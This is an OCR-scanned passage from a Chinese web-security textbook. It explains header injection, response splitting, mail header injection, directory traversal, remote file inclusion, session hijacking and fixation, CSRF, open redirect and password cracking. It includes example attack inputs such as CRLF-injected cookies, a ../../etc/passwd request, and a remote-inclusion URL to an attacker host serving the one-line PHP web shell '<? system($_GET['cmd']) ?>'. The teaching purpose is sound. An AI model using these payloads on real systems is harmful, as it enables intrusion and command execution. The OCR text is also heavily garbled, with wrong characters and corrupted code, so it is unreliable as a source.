如 下 所 示 ，Web 应 用 有 时 会 把 从 外 部 接收 到 的 数值 ， 赋 给 啊 应 首部 


字段 Location 和 Set-Cookie。 225 








Location: http://www.example.com/a.cgi?q=12345 
Set-Cookie: UID=12345 


火 12345 就 是 插入 值 


HTTP 首部 注入 可 能 像 这 样 ， 通 过 在 某 些 啊 应 首部 字段 需要 处 理 输 
出 值 的 地 方 ， 插 入 换行 发 动 攻击 。 
HTTP 首部 注入 攻击 有 可 能 会 造成 以 下 一 些 影响。 


e@ 设置 任何 Cookie 信息 
e@ 重 定向 至 任意 URL 
e@ 显示 任意 的 主体 (HTTP 响应 截断 攻击 ) 
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ea 


国 HTTP 首部 注入 攻击 案例 

下 面 我 们 以 选 定 某 个 类 别 后 即 可 跳 转 至 各 类 别 对 应 页 面 的 功能 ， 
例 ， 讲 解 HTTP 首部 注入 攻击 。 该 功能 为 每 个 类 别 都 设 定 了 一 个 类 别 
ID 值 ， 一旦 选 定 某 类 别 ， 就 会 将 该 ID 值 反映 在 啊 应 内 的 Location 首部 
字段 内 ， 形 如 Location: http://example.com/?cat=101。 仿 浏 览 大 发 生 重 定 
癌 跳 转 。 


重 定向 至 选 定 类 别 所 在 页 面 的 功能 


| | 
和 和 串 ”7 


请 从 下 方 选择 类 别 。 


所 有 的 类 别 
书籍 


游戏 











响应 首部 


Location: http://example.com/?cat=101 


: HTTP 首部 注入 攻击 示例 


攻击 者 以 下 面 的 内 容 蔡 代 之 前 的 类 别 ID 后 发 送 请 求 。 


101%0D%O0ASet-Cookie:+SID=123456789 


其 中 ，%0D%0A 代表 HTTP 报 文中 的 换行 特 ， 紧 接着 的 是 可 强制 
将 攻击 者 网 站 (http://hackr.jp/) 的 会 话 ID 设置 成 SID=123456789 的 
Set-Cookie 首部 字段 。 

发 送 该 请 求 之 后 ， 假 设 结果 返回 以 下 啊 应 。 
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> ma 


DOcarlorn ec /examle Com ?eee Ton 0D 0 Tf 
Set-Cookie: SID=123456789 


此 刻 ， 首 部 字段 Set-Cookie 已 生效 ， 因 此 攻击 者 可 指定 修改 任意 的 
Cookie 信息 。 通 过 和 会 话 固定 攻击 〈 攻 击 者 可 使 用 指定 的 会 话 ID ) 攻 
击 组 合 ， 攻 击 者 可 伪 厂 成 用 户 。 

攻击 者 输入 的 %0D%0A， 原 本 应 该 属于 首部 字段 Location 的 查询 
值 部 分 ， 但 经 过 解析 后 ，%0D%0A 变 成 了 换行 符 ， 结 采 插 入 了 新 的 首 
部 字段 。 


这 样 一 来 ， 攻 击 者 可 在 啊 应 中 插入 任意 的 站 部 字段 。 














国 HTTP 响应 截断 攻击 

HTTP 响应 截断 攻击 是 用 在 HTTP 首部 注入 的 一 种 攻击 。 攻 击 顺序 
相同 ,但 是 要 将 两 个 %0D%0A%0D%0A 并 排 插入 字符 串 后 发 送 。 利 用 
这 两 个 连续 的 换行 就 可 作出 HTTP 首部 与 主体 分 隔 所 需 的 空 行 了 ， 这 样 
就 能 显示 伪造 的 主体 ， 达 到 攻击 目的 。 这 样 的 攻击 叫做 HTTP 响应 截断 
攻击 。 














0D On OD ON ETM Hea TITIE ZE mA 





在 可 能 进行 HTTP 首部 注入 的 环节 ， 通 过 发 送 上 面 的 字符 串 ， 返 回 
结 打 得 到 以 下 这 种 啊 应 。 


Lo A 


eet Cookie UID= (0DS 0 要 傈 全 

(0D 07 TT 

<HTML><HEAD><TITLE> 之 后 ， 想 要 显示 的 网 页 内 容 一 
<!-- (原来 页 面 对 应 的 首部 字段 和 主体 部 分 全 视 为 注释 ) 
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本 





利用 这 个 攻击 , 已 触发 陷阱 的 用 户 浏 览 带 会 显示 伪造 的 Web 页 面 ， 
再 让 用 户 输 入 目 己 的 个 人 信息 每 ， 可 达到 和 跨 站 脚本 攻击 相同 的 效果 。 

为 外 ， 滥 用 HTTP/1.1 中 汇集 多 啊 应 返回 功能 ， 会 导致 缓存 服务 胡 
对 任意 内 容 进行 缓存 操作 。 这 种 攻击 称 为 缓存 污染 。 使 用 该 缓存 服务 
占 的 用 户 ， 在 浏览 遭受 攻击 的 网 站 时 ,会 不 断 地 浏览 被 蔡 换 掉 的 Web 
网 页 。 


11.2.5 ”邮件 首部 注入 攻击 

邮件 首部 注入 (Mail Header Injection ) 是 指 Web 应 用 中 的 邮件 发 送 
功能 ， 攻 击 者 通过 回 邮 件 首 部 To 或 Subject 内 任意 添加 非法 内 容 发 起 的 
攻击 。 利 用 存在 安全 漏洞 的 Web 网 站 ， 可 对 任意 邮件 地 址 发 送 广告 邮 
件 或 病毒 邮件 。 





228 ”图 邮 件 首 部 注入 攻击 案例 
下 面 以 Web 页 面 中 的 咨询 表单 为 例 讲解 邮件 首部 注入 攻击 。 该 功 
能 可 在 表单 内 填 和 人 咨询 者 的 邮件 地 址 及 咨询 内 容 后 ， 以 邮件 的 形式 发 送 


给 网 站 管理 员 。 


咨询 
请 填写 以 下 表单 后 发 送 。 


邮件 地 址 | | 


| 








: 邮件 首部 注入 攻击 案例 


攻击 者 将 以 下 数据 作为 邮件 地 址 发 起 请 求 。 
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bob@hackr.jp%0D%0ABcc: user@example.com 


%0D%0A 在 邮件 报 文 中 代表 换行 符 。 一 旦 咨询 表单 所 在 的 Web 应 
用 接收 了 这 个 换行 从 ， 就 可 能 实现 对 Bcc 邮件 地 址 的 追加 发 送 ， 而 这 原 
本 是 无 法 指定 的 。 

另外 像 下 面 一 样 ， 使 用 两 个 连续 的 换行 符 就 有 可 能 修改 邮件 文本 内 


boba@hack .jp%0D%0A%0D%0ATest Message 





再 以 相同 的 方法 ， 就 有 可 能 改写 To 和 Subject 等 任意 邮件 首部 ， 或 
问 文本 添加 附件 等 动作 。 


11.2.6 ”目录 遍历 攻击 

目录 遍历 〈Directory Traversal ) 攻击 是 指 对 本 无 意 公 开 的 文件 目 
录 ， 通 过 非法 截断 其 目录 路 径 后 ， 达 成 访问 目的 的 一 种 攻击 。 这 种 攻击 
有 时 也 称 为 路 径 遍 历 ( Path Traversal ) 攻击 。 

通过 Web 应 用 对 文件 处 理 操 作 时 ， 在 由 外 部 指定 文件 名 的 处 理 存 
在 下 漏 的 情 部 下 ， 用 户 可 使 用 .…/ 等 相对 路 径 定 位 到 /etc/passed 等 绝对 
路 径 上 ， 因 此 服务 硕 上 任意 的 文件 或 文件 目录 和 必 有 可 能 被 访问 到 。 这 样 
一 来 ， 就 有 可 能 非法 浏览 、 和 作 改 或 删除 Web 服务 器 上 的 文件 。 

固然 存在 输出 值 转 义 的 问题 ， 但 更 应 该 关闭 指定 对 任意 文件 名 的 访 
问 权 限 。 

















国有 目录 遍历 攻击 案例 
下 面 以 显示 读 取 文件 功能 为 例 ， 讲 解 目 录 遍 历 攻击 。 该 功能 通过 以 
下 查询 字段 ， 指 定 菏 个 文件 名 。 然 后 从 /www/log/ 文件 目录 下 读 取 这 个 
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am 力 
指定 的 文件 。 
http://example.com/read.php?1lo0g=0401.1og 


攻击 者 设置 如 下 查询 字段 后 发 出 请 求 。 


http://example.com/read.php?log=../../etc/passwd 


查询 字段 为 了 读 取 攻击 者 盯 上 的 /etc/passwd 文件 ， 会 从 /www/log/ 
日 录 开 始 定位 相对 路 径 。 如 果 这 份 read.php 脚本 接受 对 指定 目录 的 访问 
请 求 处 理 ， 那 原本 不 公开 的 文件 就 存在 可 被 访问 的 风险 。 


230 log=../../etc/passwd 











log=0401.lo 
read.php 
[一 


0 Oodg 
[一 





[一 


图 : 目录 遍历 攻击 案例 


11.2.7 ”远程 文件 包含 漏洞 

远程 文件 包含 漏洞 (Remote File Inclusion ) 是 指 当 部 分 脚本 内 容 需 
要 从 其 他 文件 谈 和 时， 攻击 者 利用 指定 外 部 服务 硕 的 URL 充当 依赖 文 
件 ， 让 脚本 旋 取 之 后 ， 就 可 运行 任意 脚本 的 一 种 攻击 。 

这 主要 是 PHP 存在 的 安全 漏洞 ， 对 PHP 的 include 或 require 来 说 ， 
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这 是 一 种 可 通过 设 定 ， 指 定 外 部 服务 磊 的 URL 作为 文件 名 的 功能 。 但 
是 ， 该 功能 太 危 险 ，PHP5.2.0 之 后 默认 设 定 此 功能 无 效 。 
国 然 存 在 输出 值 转 义 的 问题 ， 但 更 应 控制 对 任意 文件 名 的 指定 。 





图 远程 文件 包含 漏洞 的 攻击 案例 

下 面 以 include 读 入 由 查询 字段 指定 文件 的 功能 为 例 ， 讲 解 远程 文 
件 包含 漏 洞 。 该 功能 可 通过 以 下 查询 字段 形式 指定 文件 名 ， 并 在 脚本 内 
的 include 语句 处 读 入 这 个 指定 文件 。 


http://example.com/foo.php?mod=news .php 








对 应 脚本 的 源 代码 如 下 所 示 。 
http://example.com/foo.php 的 源 代 码 ( 部 分 摘录 ) 231 


modname ”Ger nod ll. 


include (smodname).，; 





攻击 者 指定 如 同 下 面 形式 的 URL 发 出 请 求 。 


http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=1s 








攻击 者 已 事先 在 外 部 服务 硕 上 准备 了 以 下 这 上 段 脚 本 。 
http://hackr.jp/cmd.php 的 源 代码 


=< vatem(>s GET cmgd ll ?> 


假设 Web 服务 大 (example.com ) 的 include 可 以 引入 外 部 服务 融 的 
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URL， 那 就 会 谈 和 人 攻击 者 在 外 部 服务 右上 事先 准备 的 URL ( http:/hackr 
jp/cmd.php )。 结 果 ， 通 过 system 困 数 就 能 在 Web 服务 角 (example. 
com ) 上 执行 查询 字段 指定 的 OS 命令 本。 


http://example.com/foo.php?mod=news.php 
读 入 同一 目录 下 的 文件 并 执行 








$modname = $_GETI['mod'l; 
include($modname); 








news.php 


攻击 实例 
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=ls 
读 入 外 部 服务 器 上 的 脚本 并 执行 


【 http://hackr.jp/cmd.php 的 源 代码 】 

<? system($_GET['cmd']) ?> 

通过 system 函数 就 能 够 在 example.com 服 务 器 上 执行 OS 命令 
232 


图 : 远程 文件 包含 漏洞 的 攻击 案例 








在 以 上 攻击 案例 中 ， 执 行 了 可 显示 Web 服务 需 〈example.com ) 上 
文件 及 目录 信息 的 1s 命令 。 


11.3 ” 因 设 置 或 设计 上 的 缺陷 引发 的 安全 漏洞 

因 设 置 或 设计 上 的 缺陷 引发 的 安全 漏洞 是 指 ， 错 误 设 置 Web 服务 
需 ， 或 是 由 设计 上 的 一 些 问题 引起 的 安全 漏洞 。 
11.3.1 ”强制 浏览 

强制 浏览 (Forced Browsing ) 安全 漏洞 是 指 ， 从 安置 在 Web 服务 


人 秀 的 公开 目录 下 的 文件 中 ， 训 览 那些 原本 非 目 愿 公 开 的 文件 。 
强制 浏览 有 可 能 会 造成 以 下 一 些 影响 。 








e 泄露 顾客 的 个 人 信息 等 重要 情报 
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e 泄露 原本 需要 具有 访问 权限 的 用 户 才 可 查阅 的 信息 内 容 
@ 泄露 未 外 连 到 外 界 的 文件 








对 那些 原本 不 愿 公开 的 文件 ， 为 了 保证 安全 会 隐蔽 其 URL。 可 一 
旦 知道 了 那些 URL， 也 就 意 ee bai 直接 显示 容 
易 推 测 的 文件 名 或 文件 目录 索引 时 ， 通 过 某 些 方法 可 能 会 使 URL 产生 
泄露 。 


文件 目录 一 览 


http:/www.example.com/log/ 
通过 指定 文件 目录 名 称 ， 即 可 在 文件 一 览 中 看 到 显示 的 文件 名 。 


容易 被 推测 的 文件 名 及 目录 名 

http://www.example.com/entry/entry 081202.log 

文件 名 称 容 易 推 测 ( 按 上 面 的 和 情况， 可 推出 下 一 个 文件 是 233 
entry 081203.log ) 


备份 文件 
http://www.example.com/cgi-bin/entry.cgi( 原始 文件 ) 











http://www.example.com/cgi-bin/entry.cgi~( 备份 文件 ) 

http://www.example.com/cgi-bin/entry.bak( 备份 文件 ) 

由 编辑 软件 上 自动 生成 的 备份 文件 无 执行 权限 ， 有 可 能 和 耻 接 以 源 代码 
形式 显示 


经 认证 才 可 显示 的 文件 
直接 通过 URL 访问 原本 必须 经 过 认证 才能 在 Web 页 面 上 使 用 的 文 
件 ( HTML 文件、 图 片 、PDF 等 文档 、CSS 以 及 其 他 数据 等 ) 


国 强 制 浏 览 导 致 安全 漏洞 的 案例 
下 面 我 们 以 会 员 制 度 的 SNS 日 记功 能 为 例 ， 讲 解 强 制 浏览 可 能 导 
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伊 的 安全 汤 洞 。 该 日 记功 能 保证 了 除 上 共有 访问 权限 的 用 户 本 人 以 外 ， 其 
他 人 都 不 能 访问 日 记 。 


只 有 山田 本 人 以 及 和 他 加 为 好 友 
的 用 户 才能 访问 山田 的 日 记 


山田 先生 的 日 记 一 览 
二 昌林 好 友 可 见 


日 记 的 源 代码 ( 部 分 摘录 ) 
<1Mmo Srec=uNEte//example Com 1mg/ ERNISUBAdG7BDa JPog'> 
; ] 东 到 于 小 
2 直接 指定 图 片 URL， 即 使 没有 访 
公司 的 小 K…… 问 权 限 的 用 户 也 可 能 看 到 















图 : 强制 浏览 导致 安全 漏洞 的 案例 


234 该 日 记 中 包含 的 网 像 照 片 的 源 代 码 如 下 所 示 。 


<img src="http://example.com/img/tRNqSUBdG7Da.jpg"> 


即使 没有 对 这 篇 日 记 的 访问 权限 ， 只 要 知道 这 图 片 的 URL， 通 过 
直接 指定 URL 的 方式 就 能 显示 该 图 片 。 日 记 的 功能 和 文本 具有 访问 对 
象 的 控制 ， 但 不 具备 对 图 片 访问 对 象 的 控制 ， 从 而 产生 了 安全 漏洞 。 





11.3.2 不 正确 的 错误 消息 处 理 

不 正确 的 错误 消息 处 理 ( Error Handling Vulnerability ) 的 安全 漏洞 
是 指 ，Web 应 用 的 错误 信息 内 包含 对 攻击 者 有 用 的 信息 。 与 Web 应 用 
有 关 的 主要 错误 信息 如 下 所 示 。 








e Web 应 用 抛 出 的 错误 消息 
e 数据 库 等 系统 抛 出 的 错误 消息 
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Web 应 用 不 必 在 用 户 的 浏览 画面 上 展现 详细 的 错误 消息 。 对 攻击 者 
来 说 ,详细 的 错误 消息 有 可 能 给 他 们 下 一 次 攻击 以 提示 。 





国 不 正确 的 错误 消息 处 理 导致 安全 漏洞 的 案例 


Web 应 用 抛 出 的 错误 消息 

下 面 以 认证 功能 的 认证 错误 消息 为 例 ， 讲 解 不 正确 的 错误 消息 处 理 
方式 。 该 认证 功能 ， 在 输入 表单 内 的 邮件 地 址 及 密码 匹配 发 生 错误 时 ， 
会 提示 错误 信息 。 


mm” 


邮件 地 址 | yama@example.com 


辆 记 住 登录 状态 


邮件 地 址 未 注册 
输入 的 邮件 地 址 未 注册 
请 确认 输入 的 正确 性 











给 出 的 提示 “ 邮件 地 址 未 注册 ”是 想 传 达 已 注册 
的 A 误 的 消息 。 但 由 于 提示 信息 的 差 
异 ， 同样 也 可 能 被 攻击 者 用 于 确认 账号 是 否 存在 。 


图 : 不 正确 的 错误 消息 处 理 导致 安全 漏洞 的 案例 


上 方面 面 提 示 “ 邮 件 地 址 未 注册 ”的 错误 消息 。 当 输入 的 邮件 地 址 
尚未 在 该 Web 网 站 上 注册 时 ， 就 会 触发 这 条 错误 消息 。 因 为 倘 硅 邮件 
地 址 存在 ， 应 该 会 提示 “输入 的 密码 有 误 ” 之 类 的 错误 消息 。 

攻击 者 利用 进行 不 同 的 输入 会 提示 不 同 的 错误 信息 这 条 ， 就 可 用 来 
确认 输入 的 邮件 地 址 是 否 已 在 这 个 Web 网 站 上 注册 过 了 。 

为 了 不 证 错误 消息 给 攻击 者 以 启发， 建议 将 提示 消息 的 内 容 仅 保 留 
到 “认证 错误 ”这 种 程度 即 可 。 
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数据 库 等 系统 抛 出 的 错误 消息 

下 面 我 们 以 搜索 功能 提示 的 错误 信息 为 例 ， 讲 解 不 正确 的 错误 消息 
处 理 。 本 功能 用 于 检索 数据 ， 当 输入 未 预料 的 字符 串 时 ， 会 提示 数据 库 
的 错误 。 

下 面 以 认证 功能 的 认证 错误 消息 为 例 ， 讲 解 不 正确 的 错误 消息 处 
理 。 该 认证 功能 在 输入 表单 内 的 邮件 地 址 及 密码 匹配 发 生 错误 时 ， 会 提 
示 错 误 信 息 。 





DBD::mysql::st execute falled: You have an 


error in your SOL syntax; check the manual 
that corresponds to your MySQL server 
version for the right syntax to use near ”|N 
(temnum,name,Sscn at line 1 at 
/Var/www/search.cgl line 107. 








MySOQL ) 数 据 库 。 
能 看 到 部 分 SOLT 天 句 片 段 。 


图 : 不 正确 的 错误 消息 处 理 导 致 安全 漏洞 的 案例 





上 方 的 画面 中 显示 了 与 SQL 有 关 的 错误 信息 。 对 开发 者 而 言 ， 该 
言 县 或 许 在 Debug 时 会 有 帮助 ， 但 对 用 户 训 无 用 处 。 

攻击 者 从 这 条 消息 中 可 旋 出 数据 库 选 用 的 是 MySQL， 甚 至 还 看 见 
了 SQL 语句 的 片段 。 这 可 能 给 攻击 者 进行 SQL 注入 攻击 以 启发 。 

系统 抛 出 的 错误 主要 集中 在 以 下 几 个 方面 。 














e PHP 或 ASP 等 脚本 错误 
e 数据 库 或 中 间 件 的 错误 
e Web 服务 器 的 错误 


各 系统 应 对 详细 的 错误 消息 进行 抑制 设 定 ， 或 使 用 目 定 义 错误 消 
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上 县， 以 避免 东 些 错误 信息 给 攻击 者 以 局 发 。 


11.3.3 ”开放 重 定 向 

开放 重 定 问 ( Open Redirect ) 是 一 种 对 指定 的 任意 URL 作 重 定 问 
跳 转 的 功能 。 而 于 此 功能 相关 联 的 安全 产 洞 是 指 ， 假 如 指定 的 重 定 问 
URL 到 某 个 具有 恶意 的 Web 网 站 ,那么 用 户 束 会 被 诱 导 至 那个 Web 
网 站 。 








国 开 放 重 定向 的 攻击 案例 
我 们 以 下 面 的 URL 做 重 定向 为 例 ， 讲 解 开 放 重 定向 攻击 案例 。 该 
功能 就 是 向 URL 指定 参数 后 ， 使 本 来 的 URL 发 生 重 定 问 跳 转 。 





http://example.com/?redirect=http://www.tricorder.jp 


攻击 者 把 重 定 癌 指 定 的 参数 改写 成 已 设 好 陷阱 的 Web 网 站 对 应 的 
连接 ， 如 下 所 示 。 


http://example.com/?redirect=http://hackr.jp 


用 户 看 到 URL 后 原 以 为 访问 example.com， 不 料 实际 上 被 诱导 至 
hackrjp 这 个 指定 的 重 定 问 目标 。 

可 信和 度 高 的 Web 网 站 如 条 开放 重 定 回 功 能 ， 则 很 有 可 能 被 攻击 者 
选中 并 用 来 作为 钓鱼 攻击 的 跳板 。 








11.4 “” 因 会 话 管理 疏忽 引发 的 安全 漏洞 


会 话 管理 是 用 来 管理 用 户 状 态 的 必 备 功能 ， 但 是 如 采 在 会 话 管理 上 
有 所 焉 忽 ， 就 会 导致 用 户 的 认证 状态 被 琅 取 等 后 东 。 
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11.4.1 ”会话 支持 


会 话 动 持 ( Session Hijack ) 是 指 攻击 者 通过 某 种 手段 拿 到 了 用 户 的 
会 话 IJD ， 并 非法 使 用 此 会 话 ID 伪装 成 用 户 ， 达 到 攻击 的 目的 。 








登录 中 ( 认证 状态 ) 的 会 话 1D 
http://example.com/login?sid=bb3c8a93a024e 





攻击 者 通过 某 种 手段 得 到 了 会 话 |D 
( bb3c8a93a024e ) 








http://example.com/login?sid=bb3c8a93a024e 


> 


yt Fh 
攻击 者 伪装 成 用 户 
238 欢迎 山口 先生 








图 : 会 话 动 持 


具备 认证 功能 的 Web 应 用 ,使 用 会 话 ID 的 会 话 管理 机 制 ， 作 为 管 
理 认证 状态 的 主流 方式 。 会 话 ID 中 记录 客户 端的 Cookie 等 信息 ， 服 务 
俘 站 将 会 话 ID 与 认证 状态 进行 一 对 一 匹配 管理 。 

下 面 列举 了 几 种 攻击 者 可 获得 会 话 ID 的 途径 。 





e@ 通过 非 正 规 的 生成 方法 推测 会 话 ID 
e@ 通过 窃听 或 XSS 攻击 盗 取 会 话 ID 
e@ 通过 会 话 固定 攻击 ( Session Fixation ) 强行 获取 会 话 ID 
会 话 劫持 攻击 案例 
下 面 我 们 以 认证 功能 为 例 讲 解 会 话 劫持 。 这 里 的 认证 功能 通过 会 话 
管理 机 制 ， 会 将 成 功 认 证 的 用 户 的 会 话 ID (SID ) 保存 在 用 户 浏 览 右 的 
Cookie 中 。 
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引 Cookie 
SID=f5d1278e8109 





欢迎 山口 先生 





通过 XSS 攻击 ， 设 置 利 用 JavaScript 脚 本 调用 
document.cookie 以 窃取 Cookie 信息 的 陷阱 ， 
盗 走 用 户 的 会 话 ID( SID ) 





SID=stbd127868109 


LL 


攻击 者 将 此 SID 设置 到 
攻击 者 目 己 的 浏览 器 Cookie 中 













伪装 成 用 户 





欢迎 山口 先生 





: 会 话 动 持 攻击 案例 


攻击 者 在 得 知 该 Web 网 站 存在 可 跨 站 攻击 ( XSS ) 的 安全 漏洞 后 ， 
就 设置 好 用 JavaScript 脚本 调用 document.cookie 以 贸 取 Cookie 信息 的 
陷阱 ， 一 旦 用 户 踏 人 陷阱 〈 访 问 了 该 脚本 )， 攻 击 者 就 能 获取 含有 会 话 
ID 的 Cookie。 

攻击 者 拿 到 用 户 的 会 话 I 有 DD 后， 往 目 己 的 浏览 妖 的 Cookie 中 设置 该 
会 话 也， 即 可 伪装 成 会 话 ID 遭 魏 的 用 户 ， 访 问 Web 网 站 了 。 


11.4.2 ”会 话 固定 攻击 

对 以 镭 取 日 标 会 话 ID 为 主动 攻击 手段 的 会 话 劫持 而 言 ， 会 话 固定 
攻击 ( Session Fixation ) 攻击 会 强制 用 户 使 用 攻击 者 指定 的 会 话 ID ， 属 
于 被 动 攻击 。 

















会 话 固定 攻击 案例 
下 面 我 们 以 认证 功能 为 例 讲解 会 话 固定 攻击 。 这 个 Web 网 站 的 认 
证 功能 ， 会 在 认证 前 发 布 一 个 会 话 ID ， 若 认证 成 功 ， 就 会 在 服务 器 内 
改变 认证 状态 。 
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人 访问 登录 页 面 








全 





(2) 服 务 器 发 布 一 个 会 话 1D 
攻击 者 ” http://example.com/login?SID=f5d1278e8109 
该 会 话 1D 为 ( 未 认证 ) 状 态 


(3) 将 @ 中 的 URL 作 为 陷阱 ,诱导 用 户 前 去 认证 














寺 寺 ”认证 后 , 会话 ID 变 为 ( 用户 A 已 认证 ) 状 态 
用 户 A 


全 (4) 之 后 再 用 中 的 URL 访 问 
it 


攻击 者 

















伪装 成 功 
欢迎 
用 户 A 








图 : 会 话 固定 攻击 案例 


攻击 者 准备 陷阱 ， 先 访问 Web 网 站 拿 到 会 话 ID ( SID=f5d1278e8109 )。 
此 刻 ， 会话 ID 在 服务 器 上 的 记录 仍 是 (未 认证 ) 状态 。( 步骤 中 ~ @) ) 

攻击 者 设置 好 强制 用 户 使 用 该 会 话 ID 的 陷阱 ， 并 等 得 用 户 拿 着 这 
个 会 话 卫 前 去 认证 。 一 旦 用 户 和 触发 陷阱 并 完成 认证 ， 会 话 ID 
( SID=f5d1278e8109 ) 在 服务 器 上 的 状态 (用户 A 已 认证 ) 就 会 被 记录 
下 来 。( 步骤 G@) ) 

攻击 者 估计 用 户 差不多 已 触发 陷阱 后 ， 再 利用 之 前 这 个 会 话 了 D 访 
问 网 站 。 由 于 该 会 话 ID 目前 已 是 (用 户 A 已 认证 ) 状态 ， 于 是 攻击 者 
作为 用 户 A 的 身份 顺利 登录 网 站 。( 步骤 ) 











Session Adoption 

Session Adoption 是 指 PHP 或 ASPNET 能 够 接收 人 处理 未 知 会 话 ID 
的 功能 。 

恶意 使 用 该 功能 便 可 跳 过 会 话 固定 攻击 的 准备 阶段 ， 从 Web 网 站 
获得 发 行 的 会 话 ID 的 步 又 。 即 ， 攻 击 者 可 私 目 创建 会 话 ID 构成 陷阱 ， 
中 间 件 却 会 误 以 为 该 会 话 ID 是 未 知 会 话 ID 而 接受 。 
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11.4.3 ” 跨 站 点 请 求 伪造 


跨 丫 点 请 求 伪 造 ( Cross-Site Request Forgeries，CSRF ) 攻击 是 指 攻 
击 者 通过 设置 好 的 陷阱 ， 强 制 对 已 完成 认证 的 用 户 进 行 非 预期 的 个 人 信 
息 或 设 定 信 息 等 某 些 状态 更 新 ， 属 于 被 动 攻 击 。 

路 站 点 请 求 伪 造 有 可 能 会 造成 以 下 等 影 啊 。 





e@ 利用 已 通过 认证 的 用 忆 权 限 更 新 设 定 信息 
e@ 利用 已 通过 认证 的 用 记 权 限购 买 商品 
e@ 利用 已 通过 认证 的 用 忆 权 限 在 留言 板 上 发 表 言 论 


跨 站 点 请 求 伪 造 的 攻击 案例 
下 面 以 留言 板 功 能 为 例 ， 讲 解 蜂 站 点 请 求 伪 造 。 该 功能 只 人 允许 已 认 
证 并 登录 的 用 户 在 留言 板 上 发 表 内 容 。 
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QD) 认证 通过 用 户 入 身份 





GSE/ 
Host: example.com 
Cookie: sid=1234567890 


攻击 者 布下 陷阱 
在 留言 板 上 发 表 含 有 恶意 代码 的 评论 


<img src="http: Meamole. comy/msg?dq= 你 好 "> 




















(用 户 人 A 触发 陷阱 








GET /msg?g= 你 好 HTTP/1.1 
Host: example.com 
Cookie: sid=1234567890 


用 户 人 的 浏览 器 中 的 Cookie 持 有 已 认证 的 会 话 ID, 利用 用 户 信 的 
权限 执行 发 表 动 作 














图 : 跨 站 点 请 求 伪 造 的 攻击 案例 
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ER 











在 该 留言 板 系统 上 ， 受 害 者 用 户 A 是 已 认证 状态 。 它 的 浏览 器 中 
的 Cookie 持 有 已 认证 的 会 话 ID ( 步骤 人 )。 

攻击 者 设置 好 一 旦 用 户 访问 ， 即 会 发 送 在 留言 板 上 发 表 非 主观 行为 
产生 的 评论 的 请 求 的 陷阱 。 用 户 A 的 浏览 器 执行 完 陷阱 中 的 请 求 后 ， 
留言 板 上 也 就 会 留 下 那 条 评论 ( 步 又 @ )。 

触发 陷阱 之 际 ， 如 果 用 户 A 尚未 通过 认证 ， 则 无 法 利用 用 户 A 的 
身份 权限 在 留言 板 上 发 表 内 容 。 








11.5 ”其 他 安全 漏洞 
11.5.1 密码 破解 

密码 人 破解 攻击 ( Password Cracking ) 即 算出 密码 ， 突 破 认证 。 攻 击 
不 仅 限 于 Web 应 用 ， 还 包括 其 他 的 系统 (如 FTP 或 SSH 等 )， 本 节 将 
会 讲解 对 具备 认证 功能 的 Web 应 用 进行 的 密码 破解 。 

密码 破解 有 以 下 两 种 手段 。 





e 通过 网 络 的 密码 试销 
e@ 对 已 加 密 密 码 的 破解 ( 指 攻击 者 入 侵 系 统 ， 已 获得 加 密 或 散 列 处 理 
的 密码 数据 的 情况 ) 


除去 突破 认证 的 攻击 手段 ， 还 有 SQL 注入 攻击 逃避 认证 ， 鉴 站 脚 
本 攻击 欠 取 密码 信息 等 方法 。 








国 通 过 网 络 进行 密码 试销 

对 Web 应 用 提供 的 认证 功能 ， 通 过 网 络 尝 试 候选 密码 进行 的 一 种 
攻击 。 主 要 有 以 下 两 种 方式 。 

e 穷 举 法 

e 字典 攻击 
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穷 举 法 

穷 举 法 (Brute-force Attack， 又 称 索 力 破 解法 ) 是 指 对 所 有 密 钥 集 
合 构 成 的 密 钥 空间 (Keyspace ) 进行 穷人 举 。 即 ， 用 所 有 可 行 的 候选 密码 
对 目标 的 密码 系统 试 错 ， 用 以 突破 验证 的 一 种 攻击 。 

比如 银行 采用 的 个 人 识别 码 是 由 “4 位 数字 ”组 成 的 密码 ， 那 么 就 
要 从 0000~9999 中 的 全 部 数字 逐个 进行 答 试 。 这 样 一 来 ， 必 有 是 在 候选 的 
密码 集合 中 存在 一 个 正确 的 密码 ， 可 通过 认证 。 

因为 穷 举 法 会 尝试 所 有 的 候选 密码 ， 所 以 是 一 种 必然 能 够 破解 密码 
的 攻击 。 但 是 ， 当 密 钥 空间 很 庞大 时 ， 解 密 可 能 需要 花费 数 年 ， 甚 至 千 
年 的 时 间 ， 因 此 从 现实 角度 考量 ， 攻 击 是 失败 的 。 


字典 攻击 

字典 攻击 是 指 利 用 事先 收集 好 的 候选 密码 〈 经 过 各 种 组 合 方式 后 存 
人 字典 )， 枚 举 字典 中 的 密码 ， 党 试 通过 认证 的 一 种 攻击 手法 。 

还 是 举 银行 采用 个 人 识别 码 是 “4 位 数字 ”的 密码 的 例子 ， 考 虑 到 
用 户 使 用 自己 的 生日 做 密码 的 可 能 性 较 高 ， 于 是 就 可 以 把 生日 日 期 数值 
化 ， 如 将 0101~1231 保存 成 字典 ， 进 行 尝 试 。 

与 穷 举 法 相 比 ， 由 于 逢 要 尝试 的 候选 密码 较 少 ， 总 味 着 攻击 耗费 的 
时 间 比 较 短 。 但 是 ， 如 果 字 上 典 中 没有 正确 的 密码 ， 那 就 无 法 破解 成 功 。 
因此 攻击 的 成 败 取决 于 字典 的 内 容 。 
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RAR 


罗 去 | 字典 攻击 


0000 一 ”和 失败 | 失败 | 二 0101 
0001 一 -和 失败 | 失败 | < 一 0102 
0002 0103 

一 一 此 正确 的 密码 才 - 0104 
本 9 4 
0010 0817 0816 
0011 l 0817 
3 I 
0 正确 ! 4 一 
0817 ~ 

( 最 多 尝试 366 次 ) 


以 4 位 数字 的 全 组 合 进行 穷 举 法 
= sf 
【最 多 兰 试 10 000 次 ) 使 用 字典 可 缩短 得 到 正确 密码 的 时 
间 ， 但 如 果 密 码 不 在 字典 中 就 无 法 
肯定 能 在 某 次 尝试 时 得 到 正确 密码 正确 匹配 


* 前 提 条 件 是 知道 密码 只 使 用 4 位 数 以 内 的 数字 组 成 


图 : 穷 举 法 和 字典 攻击 
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加 图 
加 加 轿 
利用 别处 泄露 的 1D . 密码 进行 攻击 
字典 攻击 中 有 一 种 利用 其 他 Web 网 站 已 泄露 的 ID 及 密码 列表 进行 的 


攻击 。 很 多 用 户 习 惯 随 意 地 在 多 个 Web 网 站 使 用 同一 套 ID 及 密码 ， 因 此 
攻击 会 当 言 的 成 率 0。 


国 对 已 加 密 密 码 的 破解 
Web 应 用 在 保存 密码 时 ， 一 般 不 会 下 接 以 明文 的 方式 保存 ， 通 过 艇 








